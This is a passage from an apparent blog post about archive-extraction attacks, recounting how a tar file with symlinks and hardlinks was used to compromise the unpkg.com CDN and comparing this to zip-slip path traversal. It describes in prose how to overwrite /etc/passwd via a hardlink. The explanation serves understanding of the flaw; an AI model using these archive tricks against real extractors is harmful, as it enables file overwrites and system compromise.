I was recently reading Max Justicz’s blog post, where he outlined how he was able to hack the unpkg.com CDN by getting the service to extract a tar file which contained: A symlink to a directory on the system, followed by a file in the symlink/directory, A hardlink pointing to a known file on the system, followed by a file named the same as that hardlink. In practical terms, this, respectively, means: Create a symlink to /tmp called link, and then extract a file to link/oops.txt, Make a hardlink foo to a file (/etc/passwd for example) that exists and unpack a regular file named foo. This will overwrite /etc/passwd. These attacks are pretty similar to the classic zip-slip vulnerabilities, which typically entail just having some type of archive that contains a file path like ../../some/target/file or /some/target/file, causing the extractor to write outside of the intended destination directory. Sometimes symlinks are involved in the classic zip-slip vulnerabilities, but those are…
No comments yet. Log in to reply on the Fediverse. Comments will appear here.